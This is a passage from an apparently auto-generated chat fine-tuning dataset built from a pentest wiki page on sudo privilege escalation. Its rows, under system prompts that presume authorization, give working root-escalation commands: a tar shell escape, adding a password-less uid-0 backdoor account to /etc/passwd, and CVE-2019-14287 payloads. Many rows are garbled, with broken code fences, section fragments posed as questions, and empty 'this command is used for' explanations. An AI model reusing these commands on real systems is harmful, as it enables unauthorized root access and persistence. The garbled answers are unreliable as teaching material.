"privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through SUDO - Practice"}, {"role": "assistant", "content": "There are many ways to escalate privileges by exploiting sudo, either by profiting from insecure configuration, or by exploiting the program's vulnerabilities."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through SUDO - Practice", "response": "There are many ways to escalate privileges by exploiting sudo, either by profiting from insecure configuration, or by exploiting the program's vulnerabilities.", "metadata": {"corpus_index": 1427, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of SUDO - Default configurations"}, {"role": "assistant", "content": "The sudo -l command can be run by sudoers to check their sudo rights. The output reflects the /etc/sudoers configuration that applies to the user. It should like the following (default config for a new sudoer).\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of SUDO - Default configurations", "response": "The sudo -l command can be run by sudoers to check their sudo rights. The output reflects the /etc/sudoers configuration that applies to the user. It should like the following (default config for a new sudoer).\n\n```bash", "metadata": {"corpus_index": 1428, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on SUDO - Default configurations"}, {"role": "assistant", "content": "The sudo -l command can be run by sudoers to check their sudo rights. The output reflects the /etc/sudoers configuration that applies to the user. It should like the following (default config for a new sudoer).\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on SUDO - Default configurations", "response": "The sudo -l command can be run by sudoers to check their sudo rights. The output reflects the /etc/sudoers configuration that applies to the user. It should like the following (default config for a new sudoer).\n\n```bash", "metadata": {"corpus_index": 1428, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Format is in the context of penetration testing"}, {"role": "assistant", "content": "User johnthesudoer may run the following commands on johncomputer:\n (ALL : ALL) ALL\n``\n\nFor instance, this configuration allows the johnthesudoer user to run any privileged command as long as johnthesudoer's password is known. A privileged session can be obtained with sudo -i, sudo -s, sudo su or sudo `."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Format is in the context of penetration testing", "response": "User johnthesudoer may run the following commands on johncomputer:\n (ALL : ALL) ALL\n``\n\nFor instance, this configuration allows the johnthesudoer user to run any privileged command as long as johnthesudoer's password is known. A privileged session can be obtained with sudo -i, sudo -s, sudo su or sudo `.", "metadata": {"corpus_index": 1429, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Format is during a pentest?"}, {"role": "assistant", "content": "User johnthesudoer may run the following commands on johncomputer:\n (ALL : ALL) ALL\n``\n\nFor instance, this configuration allows the johnthesudoer user to run any privileged command as long as johnthesudoer's password is known. A privileged session can be obtained with sudo -i, sudo -s, sudo su or sudo `."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Format is during a pentest?", "response": "User johnthesudoer may run the following commands on johncomputer:\n (ALL : ALL) ALL\n``\n\nFor instance, this configuration allows the johnthesudoer user to run any privileged command as long as johnthesudoer's password is known. A privileged session can be obtained with sudo -i, sudo -s, sudo su or sudo `.", "metadata": {"corpus_index": 1429, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain SUDO - Living off the land"}, {"role": "assistant", "content": "While the SUDO configuration can be hardened to restrict privileged execution to specific program, there are some that can be abused to bypass local security restrictions. This is called Living off the land.\n\n``bash\nUser johnthesudoer may run the following commands on johncomputer:\n (ALL : ALL) /bin/tar\n`\n\nThe configuration above only allows sudoer johnthesudoer to execute /bin/tar as root as long as johnthesudoer's password is known. The thing is tar is program that can be used to obtain a full session, hence bypassing the restrictions induced by sudoers configuration.\n\n`bash\nsudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\n`\n\nOther examples can be found on the Living off the land note.\n\nWhile some programs can be used to obtain a full shell, others can be used to induce changes on the system to grant root privileges, like /usr/bin/cp. The following commands are used to edit the /etc/passwd file to add a password-less user with root's uid and gid.\n\n`bash\ncp /etc/passwd /tmp/passwd.bak\necho \"backdoorroot::0:0:Backdoor root:/root:/bin/bash\" >> /tmp/passwd.bak\nsudo /usr/bin/cp passwd.bak /etc/passwd\nsu -l backdoorroot\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain SUDO - Living off the land", "response": "While the SUDO configuration can be hardened to restrict privileged execution to specific program, there are some that can be abused to bypass local security restrictions. This is called Living off the land.\n\n``bash\nUser johnthesudoer may run the following commands on johncomputer:\n (ALL : ALL) /bin/tar\n`\n\nThe configuration above only allows sudoer johnthesudoer to execute /bin/tar as root as long as johnthesudoer's password is known. The thing is tar is program that can be used to obtain a full session, hence bypassing the restrictions induced by sudoers configuration.\n\n`bash\nsudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\n`\n\nOther examples can be found on the Living off the land note.\n\nWhile some programs can be used to obtain a full shell, others can be used to induce changes on the system to grant root privileges, like /usr/bin/cp. The following commands are used to edit the /etc/passwd file to add a password-less user with root's uid and gid.\n\n`bash\ncp /etc/passwd /tmp/passwd.bak\necho \"backdoorroot::0:0:Backdoor root:/root:/bin/bash\" >> /tmp/passwd.bak\nsudo /usr/bin/cp passwd.bak /etc/passwd\nsu -l backdoorroot\n``", "metadata": {"corpus_index": 1430, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do SUDO - Living off the land"}, {"role": "assistant", "content": "While the SUDO configuration can be hardened to restrict privileged execution to specific program, there are some that can be abused to bypass local security restrictions. This is called Living off the land.\n\n``bash\nUser johnthesudoer may run the following commands on johncomputer:\n (ALL : ALL) /bin/tar\n`\n\nThe configuration above only allows sudoer johnthesudoer to execute /bin/tar as root as long as johnthesudoer's password is known. The thing is tar is program that can be used to obtain a full session, hence bypassing the restrictions induced by sudoers configuration.\n\n`bash\nsudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\n`\n\nOther examples can be found on the Living off the land note.\n\nWhile some programs can be used to obtain a full shell, others can be used to induce changes on the system to grant root privileges, like /usr/bin/cp. The following commands are used to edit the /etc/passwd file to add a password-less user with root's uid and gid.\n\n`bash\ncp /etc/passwd /tmp/passwd.bak\necho \"backdoorroot::0:0:Backdoor root:/root:/bin/bash\" >> /tmp/passwd.bak\nsudo /usr/bin/cp passwd.bak /etc/passwd\nsu -l backdoorroot\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do SUDO - Living off the land", "response": "While the SUDO configuration can be hardened to restrict privileged execution to specific program, there are some that can be abused to bypass local security restrictions. This is called Living off the land.\n\n``bash\nUser johnthesudoer may run the following commands on johncomputer:\n (ALL : ALL) /bin/tar\n`\n\nThe configuration above only allows sudoer johnthesudoer to execute /bin/tar as root as long as johnthesudoer's password is known. The thing is tar is program that can be used to obtain a full session, hence bypassing the restrictions induced by sudoers configuration.\n\n`bash\nsudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\n`\n\nOther examples can be found on the Living off the land note.\n\nWhile some programs can be used to obtain a full shell, others can be used to induce changes on the system to grant root privileges, like /usr/bin/cp. The following commands are used to edit the /etc/passwd file to add a password-less user with root's uid and gid.\n\n`bash\ncp /etc/passwd /tmp/passwd.bak\necho \"backdoorroot::0:0:Backdoor root:/root:/bin/bash\" >> /tmp/passwd.bak\nsudo /usr/bin/cp passwd.bak /etc/passwd\nsu -l backdoorroot\n``", "metadata": {"corpus_index": 1430, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the User command for sudo - living off the land"}, {"role": "assistant", "content": "User johnthesudoer may run the following commands on johncomputer:\n (ALL : ALL) /bin/tar"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the User command for sudo - living off the land", "response": "User johnthesudoer may run the following commands on johncomputer:\n (ALL : ALL) /bin/tar", "metadata": {"corpus_index": 1431, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "User"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do SUDO - Living off the land"}, {"role": "assistant", "content": "User johnthesudoer may run the following commands on johncomputer:\n (ALL : ALL) /bin/tar"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do SUDO - Living off the land", "response": "User johnthesudoer may run the following commands on johncomputer:\n (ALL : ALL) /bin/tar", "metadata": {"corpus_index": 1431, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `User johnthesudoer may run the following commands on johncomputer:`?"}, {"role": "assistant", "content": "This command is used for sudo - living off the land. Living off the land"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `User johnthesudoer may run the following commands on johncomputer:`?", "response": "This command is used for sudo - living off the land. Living off the land", "metadata": {"corpus_index": 1431, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the tar command for sudo - living off the land"}, {"role": "assistant", "content": "sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the tar command for sudo - living off the land", "response": "sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh", "metadata": {"corpus_index": 1432, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "tar"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on SUDO - Living off the land"}, {"role": "assistant", "content": "sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on SUDO - Living off the land", "response": "sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh", "metadata": {"corpus_index": 1432, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh`?"}, {"role": "assistant", "content": "This command is used for sudo - living off the land. Living off the land"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh`?", "response": "This command is used for sudo - living off the land. Living off the land", "metadata": {"corpus_index": 1432, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the cp command to sudo - living off the land"}, {"role": "assistant", "content": "cp /etc/passwd /tmp/passwd.bak\necho \"backdoorroot::0:0:Backdoor root:/root:/bin/bash\" >> /tmp/passwd.bak\nsudo /usr/bin/cp passwd.bak /etc/passwd\nsu -l backdoorroot"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the cp command to sudo - living off the land", "response": "cp /etc/passwd /tmp/passwd.bak\necho \"backdoorroot::0:0:Backdoor root:/root:/bin/bash\" >> /tmp/passwd.bak\nsudo /usr/bin/cp passwd.bak /etc/passwd\nsu -l backdoorroot", "metadata": {"corpus_index": 1433, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "cp"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through SUDO - Living off the land"}, {"role": "assistant", "content": "cp /etc/passwd /tmp/passwd.bak\necho \"backdoorroot::0:0:Backdoor root:/root:/bin/bash\" >> /tmp/passwd.bak\nsudo /usr/bin/cp passwd.bak /etc/passwd\nsu -l backdoorroot"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through SUDO - Living off the land", "response": "cp /etc/passwd /tmp/passwd.bak\necho \"backdoorroot::0:0:Backdoor root:/root:/bin/bash\" >> /tmp/passwd.bak\nsudo /usr/bin/cp passwd.bak /etc/passwd\nsu -l backdoorroot", "metadata": {"corpus_index": 1433, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `cp /etc/passwd /tmp/passwd.bak`?"}, {"role": "assistant", "content": "This command is used for sudo - living off the land. Living off the land"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `cp /etc/passwd /tmp/passwd.bak`?", "response": "This command is used for sudo - living off the land. Living off the land", "metadata": {"corpus_index": 1433, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about SUDO - CVE-2019-14287 (#-1)"}, {"role": "assistant", "content": "With SUDO running version < 1.8.28, an attacker in control of a \"runas ALL\" sudoer account can bypass certain policy blacklists and session PAM modules by invoking sudo with a crafted user ID. \n\nExploiting the bug requires sudo privileges and being able to run commands with an arbitrary user ID. This means the user's sudoers entry has to have the special value ALL in the \"runas\" specifier (the yellow and green parts in the doodle above).\n\nVulnerable users can be found with the two commands below\n\n``bash\ngrep -e '(\\sALL\\s,\\s!root\\s)' /etc/sudoers\ngrep -e '(\\sALL\\s,\\s\\!#0\\s)' /etc/sudoers\n`\n\nThe vulnerability can be exploited with one of the following payloads\n\n`bash\nsudo -u#-1 sh -p\nsudo -u#4294967295 sh -p\nsudo -u#$((0xffffffff)) sh -p\n`\n\n> [!TIP]\n> Some technical details to the vulnerability\n> \n> Sudo uses the setresuid(2) and setreuid(2) system calls to change the user ID before running the command. So if you try to enter a negative user id -1 (or its 32-bit unsigned equivalent 4294967295), setresuid(2) and setreuid(2) cannot set a negative user id and you're left with the user id sudo is running with : 0.\n> \n> Therefore sudo -u#-1 id -u or sudo -u#4294967295 id -u will actually return uid=0` and run command as root.\n> \n> More info can be found here"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about SUDO - CVE-2019-14287 (#-1)", "response": "With SUDO running version < 1.8.28, an attacker in control of a \"runas ALL\" sudoer account can bypass certain policy blacklists and session PAM modules by invoking sudo with a crafted user ID. \n\nExploiting the bug requires sudo privileges and being able to run commands with an arbitrary user ID. This means the user's sudoers entry has to have the special value ALL in the \"runas\" specifier (the yellow and green parts in the doodle above).\n\nVulnerable users can be found with the two commands below\n\n``bash\ngrep -e '(\\sALL\\s,\\s!root\\s)' /etc/sudoers\ngrep -e '(\\sALL\\s,\\s\\!#0\\s)' /etc/sudoers\n`\n\nThe vulnerability can be exploited with one of the following payloads\n\n`bash\nsudo -u#-1 sh -p\nsudo -u#4294967295 sh -p\nsudo -u#$((0xffffffff)) sh -p\n`\n\n> [!TIP]\n> Some technical details to the vulnerability\n> \n> Sudo uses the setresuid(2) and setreuid(2) system calls to change the user ID before running the command. So if you try to enter a negative user id -1 (or its 32-bit unsigned equivalent 4294967295), setresuid(2) and setreuid(2) cannot set a negative user id and you're left with the user id sudo is running with : 0.\n> \n> Therefore sudo -u#-1 id -u or sudo -u#4294967295 id -u will actually return uid=0` and run command as root.\n> \n> More info can be found here", "metadata": {"corpus_index": 1434, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out SUDO - CVE-2019-14287 (#-1) during a pentest?"}, {"role": "assistant", "content": "With SUDO running version < 1.8.28, an attacker in control of a \"runas ALL\" sudoer account can bypass certain policy blacklists and session PAM modules by invoking sudo with a crafted user ID. \n\nExploiting the bug requires sudo privileges and being able to run commands with an arbitrary user ID. This means the user's sudoers entry has to have the special value ALL in the \"runas\" specifier (the yellow and green parts in the doodle above).\n\nVulnerable users can be found with the two commands below\n\n``bash\ngrep -e '(\\sALL\\s,\\s!root\\s)' /etc/sudoers\ngrep -e '(\\sALL\\s,\\s\\!#0\\s)' /etc/sudoers\n`\n\nThe vulnerability can be exploited with one of the following payloads\n\n`bash\nsudo -u#-1 sh -p\nsudo -u#4294967295 sh -p\nsudo -u#$((0xffffffff)) sh -p\n`\n\n> [!TIP]\n> Some technical details to the vulnerability\n> \n> Sudo uses the setresuid(2) and setreuid(2) system calls to change the user ID before running the command. So if you try to enter a negative user id -1 (or its 32-bit unsigned equivalent 4294967295), setresuid(2) and setreuid(2) cannot set a negative user id and you're left with the user id sudo is running with : 0.\n> \n> Therefore sudo -u#-1 id -u or sudo -u#4294967295 id -u will actually return uid=0` and run command as root.\n> \n> More info can be found here"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out SUDO - CVE-2019-14287 (#-1) during a pentest?", "response": "With SUDO running version < 1.8.28, an attacker in control of a \"runas ALL\" sudoer account can bypass certain policy blacklists and session PAM modules by invoking sudo with a crafted user ID. \n\nExploiting the bug requires sudo privileges and being able to run commands with an arbitrary user ID. This means the user's sudoers entry has to have the special value ALL in the \"runas\" specifier (the yellow and green parts in the doodle above).\n\nVulnerable users can be found with the two commands below\n\n``bash\ngrep -e '(\\sALL\\s,\\s!root\\s)' /etc/sudoers\ngrep -e '(\\sALL\\s,\\s\\!#0\\s)' /etc/sudoers\n`\n\nThe vulnerability can be exploited with one of the following payloads\n\n`bash\nsudo -u#-1 sh -p\nsudo -u#4294967295 sh -p\nsudo -u#$((0xffffffff)) sh -p\n`\n\n> [!TIP]\n> Some technical details to the vulnerability\n> \n> Sudo uses the setresuid(2) and setreuid(2) system calls to change the user ID before running the command. So if you try to enter a negative user id -1 (or its 32-bit unsigned equivalent 4294967295), setresuid(2) and setreuid(2) cannot set a negative user id and you're left with the user id sudo is running with : 0.\n> \n> Therefore sudo -u#-1 id -u or sudo -u#4294967295 id -u will actually return uid=0` and run command as root.\n> \n> More info can be found here", "metadata": {"corpus_index": 1434, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the grep command to sudo - cve-2019-14287 (#-1)"}, {"role": "assistant", "content": "grep -e '(\\s*ALL\\s*,\\s*!root\\s*)' /etc/sudoers\ngrep -e '(\\s*ALL\\s*,\\s*\\!#0\\s*)' /etc/sudoers"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the grep command to sudo - cve-2019-14287 (#-1)", "response": "grep -e '(\\s*ALL\\s*,\\s*!root\\s*)' /etc/sudoers\ngrep -e '(\\s*ALL\\s*,\\s*\\!#0\\s*)' /etc/sudoers", "metadata": {"corpus_index": 1435, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "grep"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on SUDO - CVE-2019-14287 (#-1)"}, {"role": "assistant", "content": "grep -e '(\\s*ALL\\s*,\\s*!root\\s*)' /etc/sudoers\ngrep -e '(\\s*ALL\\s*,\\s*\\!#0\\s*)' /etc/sudoers"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on SUDO - CVE-2019-14287 (#-1)", "response": "grep -e '(\\s*ALL\\s*,\\s*!root\\s*)' /etc/sudoers\ngrep -e '(\\s*ALL\\s*,\\s*\\!#0\\s*)' /etc/sudoers", "metadata": {"corpus_index": 1435, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `grep -e '(\\s*ALL\\s*,\\s*!root\\s*)' /etc/sudoers`?"}, {"role": "assistant", "content": "This command is used for sudo - cve-2019-14287 (#-1). CVE-2019-14287 (#-1)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `grep -e '(\\s*ALL\\s*,\\s*!root\\s*)' /etc/sudoers`?", "response": "This command is used for sudo - cve-2019-14287 (#-1). CVE-2019-14287 (#-1)", "metadata": {"corpus_index": 1435, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform SUDO - CVE-2019-14287 (#-1)?"}, {"role": "assistant", "content": "sudo -u#-1 sh -p\nsudo -u#4294967295 sh -p\nsudo -u#$((0xffffffff)) sh -p"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform SUDO - CVE-2019-14287 (#-1)?", "response": "sudo -u#-1 sh -p\nsudo -u#4294967295 sh -p\nsudo -u#$((0xffffffff)) sh -p", "metadata": {"corpus_index": 1436, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `sudo -u#-1 sh -p`?"}, {"role": "assistant", "content": "This command is used for sudo - cve-2019-14287 (#-1). CVE-2019-14287 (#-1)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `sudo -u#-1 sh -p`?", "response": "This command is used for sudo - cve-2019-14287 (#-1). CVE-2019-14287 (#-1)", "metadata": {"corpus_index": 1436, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of SUDO - CVE-2021-3156 (Baron Samedit)"}, {"role": "assistant", "content": "With SUDO running version < 1.9.5p2, a Heap-based Buffer Overflow allows for privilege escalation to root via sudoedit -s and a command-line argument that ends with a single backslash character. To test if a system is vulnerable or not, the following command can be run as a non-root user.\n\n``bash\nsudoedit -s /\n`\n\nPatched versions will throw a usage: help message while vulnerable ones 